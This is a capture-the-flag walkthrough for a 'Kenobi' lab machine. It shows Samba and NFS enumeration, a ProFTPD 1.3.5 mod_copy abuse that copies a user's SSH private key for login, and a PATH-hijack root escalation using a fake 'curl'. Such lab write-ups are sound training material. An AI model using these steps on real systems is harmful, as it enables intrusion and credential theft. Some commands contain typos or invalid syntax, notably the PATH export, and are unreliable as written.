# Kenobi

![alt logo](https://i.imgur.com/nGngogN.png)
- Name: Kenobi
- Description: Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation. 

## Deploy the vulnerable machine:
- Scan the machine with nmap, how many ports are open?
  ```bash
  nmap -sC -sV [MACHINE_IP] -oN nmap_scan.txt && cat nmap_scan.txt | grep open | wc -l
  ```
  - Answer: 7.
## Enumerating Samba for shares:
- Using the nmap command above, how many shares have been found?
  ```bash
  nmap -p 445 --script=smb-enum-* [MACHINE_IP]
  ```
  ```
  | smb-enum-shares: 
  |   account_used: guest
  |   \\10.10.158.155\IPC$: 
  |     Type: STYPE_IPC_HIDDEN
  |     Comment: IPC Service (kenobi server (Samba, Ubuntu))
  |     Users: 2
  |     Max Users: <unlimited>
  |     Path: C:\tmp
  |     Anonymous access: READ/WRITE
  |     Current user access: READ/WRITE
  |   \\10.10.158.155\anonymous: 
  |     Type: STYPE_DISKTREE
  |     Comment: 
  |     Users: 0
  |     Max Users: <unlimited>
  |     Path: C:\home\kenobi\share
  |     Anonymous access: READ/WRITE
  |     Current user access: READ/WRITE
  |   \\10.10.158.155\print$: 
  |     Type: STYPE_DISKTREE
  |     Comment: Printer Drivers
  |     Users: 0
  |     Max Users: <unlimited>
  |     Path: C:\var\lib\samba\printers
  |     Anonymous access: <none>
  |_    Current user access: <none>
  ```
  - Answer: 3.
- Once you're connected, list the files on the share. What is the file can you see?
  ```bash
  smbclient //[MACHINE_IP]/anonymoys
  ```
  - Answer: log.txt.
- What port is FTP running on?
  ```bash
  cat nmap_scan | grep ftp
  ```
  - Answer: 21.
- What mount can we see?
  ```bash
  nmap -p111 --script=nfs* [MACHINE_IP]
  ```
  - Answer: /var.

## Gain initial access with ProFtpd:
- What is the version?
  - Answer: 1.3.5.
- How many exploits are there for the ProFTPd running?
  ```bash
  searchsploit ProFTPD 1.3.5
  ```
  - Answer: 3.
- What is Kenobi's user flag (/home/kenobi/user.txt)?
  ```bash
  nc [MACHINE_IP] 21 && mkdir /mnt/kenobi1 && mount [MACHINE_IP]:/var /mnt/kenobi1 && cp /mnt/kenobi1/tmp/id_rsa ./id_rsa1 && chmod 600 id_rsa1 && ssh -i id_rsa1 kenobi@[MACHINE_IP]
  ```
  ```
  # FTP CMDS:
  SITE CPFR /home/kenobi/.ssh/id_rsa
  SITE CPTO /var/tmp/id_rsa
  quit
  [ENTER]
  ```
  - Answer: "content of /home/kenobi/user.txt".
 ## Privilege Escalation with Path Variable Manipulation:
 - What file looks particularly out of the ordinary?
  - Answer: /usr/bin/menu.
 - Run the binary, how many options appear?
    ```bash
    /usr/bin/menu
    ```
  - Answer: 3.
- What is the root flag (/root/root.txt)?
  ```bash
  cd /tmp && echo /bin/sh > curl && chmod 777 curl && export PATH:/tmp:$PATH && /usr/bin/menu
  # choose 1
  ```
  - Answer: *content of /root/root.txt*

